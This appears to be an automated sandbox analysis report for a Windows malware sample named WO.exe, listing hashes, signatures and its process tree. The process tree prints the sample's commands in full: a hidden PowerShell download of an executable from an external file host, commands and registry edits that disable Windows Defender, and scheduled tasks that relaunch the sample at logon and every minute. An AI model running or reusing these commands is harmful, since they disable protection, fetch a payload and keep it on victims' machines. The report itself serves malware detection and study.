Analysis

  • max time kernel
    120s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    23-12-2024 18:53

General

  • Target

    WO.exe

  • Size

    126KB

  • MD5

    7176b040816932541eb9c2b91d90b29b

  • SHA1

    137a9c4620366caff2a1d1c297b6ae8c6d28761d

  • SHA256

    db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95

  • SHA512

    1332645e8c6b53994b4f3f28b980c1fe646cec1771e77982a85ec4036725f4f2930bd9a45caea8a03b8a8ece0b432955b0d55e09396f5a80fd7c0d2825b0d1de

  • SSDEEP

    3072:a2sMWkzbJh1qZ9QW69hd1MMdxPe9N9uA0hu9TBfcX011:7bJhs7QW69hd1MMdxPe9N9uA0hu9TBZn

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe

Signatures

  • Disables service(s) 3 TTPs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Blocklisted process makes network request 6 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Run Powershell and hide display window.

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 1 IoCs
  • Drops file in System32 directory 4 IoCs
  • Launches sc.exe 3 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Runs net.exe
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Views/modifies file attributes 1 TTPs 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\WO.exe
    "C:\Users\Admin\AppData\Local\Temp\WO.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1860
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\5A31.tmp\5A32.tmp\5A33.bat C:\Users\Admin\AppData\Local\Temp\WO.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2296
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2792
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\Admin\AppData\Local\Temp\reddit.exe')"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2748
      • C:\Windows\system32\attrib.exe
        attrib -h "C:\Users\Admin\AppData\Roaming\HiddenScripts\WO.exe"
        3⤵
        • Views/modifies file attributes
        PID:2960
      • C:\Windows\system32\schtasks.exe
        schtasks /query /TN "RunRedditLogon"
        3⤵
          PID:2848
        • C:\Windows\system32\schtasks.exe
          schtasks /create /tn "RunRedditLogon" /tr "C:\Users\Admin\AppData\Roaming\HiddenScripts\WO.exe" /sc onlogon /rl highest /f
          3⤵
          • Scheduled Task/Job: Scheduled Task
          PID:2636
        • C:\Windows\system32\schtasks.exe
          schtasks /query /TN "RunRedditMinute"
          3⤵
            PID:2672
          • C:\Windows\system32\schtasks.exe
            schtasks /create /tn "RunRedditMinute" /tr "C:\Users\Admin\AppData\Roaming\HiddenScripts\WO.exe" /sc minute /mo 1 /rl highest /f
            3⤵
            • Scheduled Task/Job: Scheduled Task
            PID:2548
          • C:\Windows\system32\sc.exe
            sc config WinDefend start= disabled
            3⤵
            • Launches sc.exe
            PID:2756
          • C:\Windows\system32\net.exe
            net stop WinDefend
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:2496
            • C:\Windows\system32\net1.exe
              C:\Windows\system32\net1 stop WinDefend
              4⤵
                PID:2516
            • C:\Windows\system32\reg.exe
              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
              3⤵
                PID:2532
              • C:\Windows\system32\reg.exe
                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
                3⤵
                • Modifies Windows Defender Real-time Protection settings
                PID:2564
          • C:\Windows\system32\taskeng.exe
            taskeng.exe {167A4F3A-BF8D-4892-840F-E7A45BC0314D} S-1-5-21-3533259084-2542256011-65585152-1000:XPAJOTIY\Admin:Interactive:[1]
            1⤵
            • Loads dropped DLL
            • Suspicious use of WriteProcessMemory
            PID:2844
            • C:\Users\Admin\AppData\Roaming\HiddenScripts\WO.exe
              C:\Users\Admin\AppData\Roaming\HiddenScripts\WO.exe
              2⤵
              • Executes dropped EXE
              • Suspicious use of WriteProcessMemory
              PID:2016
              • C:\Windows\system32\cmd.exe
                "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\2C5E.tmp\2C5F.tmp\2C60.bat C:\Users\Admin\AppData\Roaming\HiddenScripts\WO.exe"
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:324
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
                  4⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Drops file in System32 directory
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2460
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\Admin\AppData\Local\Temp\reddit.exe')"
                  4⤵
                  • Blocklisted process makes network request
                  • Command and Scripting Interpreter: PowerShell
                  • Drops file in System32 directory
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1560
                • C:\Windows\system32\attrib.exe
                  attrib -h "C:\Users\Admin\AppData\Roaming\HiddenScripts\WO.exe"
                  4⤵
                  • Views/modifies file attributes
                  PID:2008
                • C:\Windows\system32\schtasks.exe
                  schtasks /query /TN "RunRedditLogon"
                  4⤵
                    PID:1992
                  • C:\Windows\system32\schtasks.exe
                    schtasks /query /TN "RunRedditMinute"
                    4⤵
                      PID:2004
                    • C:\Windows\system32\sc.exe
                      sc config WinDefend start= disabled
                      4⤵
                      • Launches sc.exe
                      PID:1960
                    • C:\Windows\system32\net.exe
                      net stop WinDefend
                      4⤵
                        PID:2100
                        • C:\Windows\system32\net1.exe
                          C:\Windows\system32\net1 stop WinDefend
                          5⤵
                            PID:2076
                        • C:\Windows\system32\reg.exe
                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
                          4⤵
                            PID:2368
                          • C:\Windows\system32\reg.exe
                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
                            4⤵
                            • Modifies Windows Defender Real-time Protection settings
                            PID:2596
                      • C:\Users\Admin\AppData\Roaming\HiddenScripts\WO.exe
                        C:\Users\Admin\AppData\Roaming\HiddenScripts\WO.exe
                        2⤵
                        • Executes dropped EXE
                        PID:316
                        • C:\Windows\system32\cmd.exe
                          "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\162F.tmp\1630.tmp\1631.bat C:\Users\Admin\AppData\Roaming\HiddenScripts\WO.exe"
                          3⤵
                            PID:1328
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
                              4⤵
                              • Command and Scripting Interpreter: PowerShell
                              • Drops file in System32 directory
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1332
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              powershell -windowstyle hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe', 'C:\Users\Admin\AppData\Local\Temp\reddit.exe')"
                              4⤵
                              • Blocklisted process makes network request
                              • Command and Scripting Interpreter: PowerShell
                              • Drops file in System32 directory
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1444
                            • C:\Windows\system32\attrib.exe
                              attrib -h "C:\Users\Admin\AppData\Roaming\HiddenScripts\WO.exe"
                              4⤵
                              • Views/modifies file attributes
                              PID:2164
                            • C:\Windows\system32\schtasks.exe
                              schtasks /query /TN "RunRedditLogon"
                              4⤵
                                PID:2896
                              • C:\Windows\system32\schtasks.exe
                                schtasks /query /TN "RunRedditMinute"
                                4⤵
                                  PID:1320
                                • C:\Windows\system32\sc.exe
                                  sc config WinDefend start= disabled
                                  4⤵
                                  • Launches sc.exe
                                  PID:1716
                                • C:\Windows\system32\net.exe
                                  net stop WinDefend
                                  4⤵
                                    PID:1520
                                    • C:\Windows\system32\net1.exe
                                      C:\Windows\system32\net1 stop WinDefend
                                      5⤵
                                        PID:996
                                    • C:\Windows\system32\reg.exe
                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
                                      4⤵
                                        PID:3032
                                      • C:\Windows\system32\reg.exe
                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
                                        4⤵
                                        • Modifies Windows Defender Real-time Protection settings
                                        PID:2084

                                Network

                                MITRE ATT&CK Enterprise v15

                                Replay Monitor

                                Loading Replay Monitor...

                                Downloads

                                • C:\Users\Admin\AppData\Local\Temp\5A31.tmp\5A32.tmp\5A33.bat

                                  Filesize

                                  2KB

                                  MD5

                                  c0e9bc2dfff6e08df8196809b9bbf253

                                  SHA1

                                  006e88ea359145c40a6bbca55e6f21b387999255

                                  SHA256

                                  43c1dfafac6c340f420057606f317c2d0d3182c04f1a9c76b782f818c85f4f11

                                  SHA512

                                  5b0c012aca5479bf3b8852e1504465ccb2ad6ce4134ee8d2ad57c898fd91ac19f96a669ebc3a9201e65099ed1723f4515b48ca25ea21681ad45377ce3d9ca60c

                                • C:\Users\Admin\AppData\Roaming\HiddenScripts\WO.exe

                                  Filesize

                                  126KB

                                  MD5

                                  7176b040816932541eb9c2b91d90b29b

                                  SHA1

                                  137a9c4620366caff2a1d1c297b6ae8c6d28761d

                                  SHA256

                                  db9756031d99dcddae9e9254bd76156a580331a43802b6faa68d2fd62c5b7e95

                                  SHA512

                                  1332645e8c6b53994b4f3f28b980c1fe646cec1771e77982a85ec4036725f4f2930bd9a45caea8a03b8a8ece0b432955b0d55e09396f5a80fd7c0d2825b0d1de

                                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                                  Filesize

                                  7KB

                                  MD5

                                  64cd7615418c0d0c7e54625e2357a8a9

                                  SHA1

                                  0e6b62667ba4dbfbb3c694bea2062893bd2cd628

                                  SHA256

                                  f540158992a802230f3453f93e32f6dc3d5f32f1dd68861e8e204ef4d8291a05

                                  SHA512

                                  602560baa8fea3a1eaedff19fcdb52394d881b7e8724e79e36287acb861eb766c2c7311a787dbcdb9ce49e9855afbce643167f76f4ca9ae2d3016ef22356703c

                                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                                  Filesize

                                  7KB

                                  MD5

                                  c9a5c2e3f020c0fb9f5ddfdbbbb8ed7d

                                  SHA1

                                  ff7730feb60cd5c3d09ac49bf00d2fc7ad6f38a5

                                  SHA256

                                  12a8cf8a003c039192e95d4ad3475bd34d54279efc738eb06913110cf2355c6b

                                  SHA512

                                  b848a95a44b45e3c97817838aeaad8c33e7c8c3d7c18e1b12b9e61cc74031490f57f63aa870a5577340ace42ad254652f86af6e09a938b1a43b9f8b87daf06c8

                                • memory/2748-20-0x0000000001F50000-0x0000000001F58000-memory.dmp

                                  Filesize

                                  32KB

                                • memory/2748-19-0x000000001B5B0000-0x000000001B892000-memory.dmp

                                  Filesize

                                  2.9MB

                                • memory/2792-8-0x0000000001EF0000-0x0000000001EF8000-memory.dmp

                                  Filesize

                                  32KB

                                • memory/2792-10-0x0000000002C34000-0x0000000002C37000-memory.dmp

                                  Filesize

                                  12KB

                                • memory/2792-11-0x0000000002C3B000-0x0000000002CA2000-memory.dmp

                                  Filesize

                                  412KB

                                • memory/2792-13-0x000007FEF5280000-0x000007FEF5C1D000-memory.dmp

                                  Filesize

                                  9.6MB

                                • memory/2792-12-0x000007FEF5280000-0x000007FEF5C1D000-memory.dmp

                                  Filesize

                                  9.6MB

                                • memory/2792-9-0x000007FEF5280000-0x000007FEF5C1D000-memory.dmp

                                  Filesize

                                  9.6MB

                                • memory/2792-7-0x000000001B840000-0x000000001BB22000-memory.dmp

                                  Filesize

                                  2.9MB

                                • memory/2792-6-0x000007FEF553E000-0x000007FEF553F000-memory.dmp

                                  Filesize

                                  4KB